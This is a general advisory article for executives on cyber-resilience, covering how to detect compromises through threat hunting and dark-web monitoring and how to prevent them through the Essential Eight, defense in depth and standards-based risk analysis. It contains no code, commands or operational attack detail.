There aren’t many organizations that can confidently say that they will never be hacked. And those that do probably shouldn’t. As a result, security strategies are moving from cyber-prevention to cyber-resilience. In layman’s terms, this simply means that you make your environment resilient enough that it is difficult for hackers to attack you based on the controls you have in place. If you do get hacked, you have processes in place to recover quickly and successfully.
There are two questions that all CXOs have on their minds when it comes to cyber-resilience.
1. How do I know if we have been compromised?
Attackers are getting smarter by the day. On average it takes around 200 days before a compromise is discovered. To shorten this timeframe, the following four points are recommended:
- Do your research. Understand who is targeting you, and how, so you can proactively defend yourself.
- Perform a compromise assessment. Engage a specialist threat-hunting organization that can help you review your environment for common threats.
- Perform threat hunting and red teaming exercises. Proactively and regularly hunt for specific threats and their associated Indicators of Compromise (IOCs) in your environment using the MITRE ATT&CK framework as a guide.
- Monitor the dark web and obtain targeted threat intelligence. Stolen data almost always ends up on the dark web. Keeping a watching brief for your data on the dark web can help identify a security breach.
When a breach is detected, containing the extent of the breach and recovery are the next steps. Containment can range from isolating a single affected system to the entire environment, depending on the spread of the compromise. Similarly, recovery ranges from simple infection removal to a complete system rebuild from backups based on the severity of the compromise. During both phases, it is important to preserve evidence, particularly if you want to prosecute the perpetrators.
2. How do I stop us from being compromised?
Cover the basics. Discover and classify data. Know where your data is, classify it based on criticality and then secure it accordingly. As a start, review the Essential Eight mitigation strategies recommended by the Australian Cyber Security Centre. Understand what these are and assess your environment against them. Immediately address any that are missing.
Take an attack-based approach to security. To truly protect yourself from attacks it is important to understand the stages of a common attack and how can you apply controls at each stage to protect yourself. What is a common attack methodology in sequential order? Email-based attack, malware injection, local machine takeover/infection, privilege escalation and data exfiltration. Controls within a cybersecurity context generally fall into four categories: Predict, Protect, Detect and Respond.
We need to look at all the steps in the attack methodology and apply controls for each category of control for each step in the attack methodology to help stop the attack. This is commonly known as defense in depth. The simplest way to do this is in a table where you map existing controls against each category of controls that protect against the relevant attack phase. Any gaps should be addressed urgently. As you do this simple gap analysis, do not forget controls for people and processes, physical security, disaster recovery and third parties. Mapping your controls to an adversary’s attack methodology is the best way to stop the attack.
Get strategic. The advice so far has been purely tactical. Threats will evolve and get worse. The only way to truly protect yourself is to conduct a robust risk analysis of your environment using standards such as ISO 27001, NIST, etc., and address the issues that are found. Start with a simple health check. Understand your vulnerabilities and address them methodically. Moreover, once you are done, rinse and repeat! The threat landscape and your environment will constantly change and evolve. In order to stay on top of new and emerging threats, you have to stay ever vigilant and reassess your risks regularly.
In addition, engage in intelligence-led security. Simply put, this means having relevant intelligence about threats and vulnerabilities related to your environment and protecting yourself against them.
Unfortunately, there are no silver bullets in cybersecurity. The best you can do is become cyber-resilient. The good news is that these steps will put your organization in a better position to deal with the threats of tomorrow.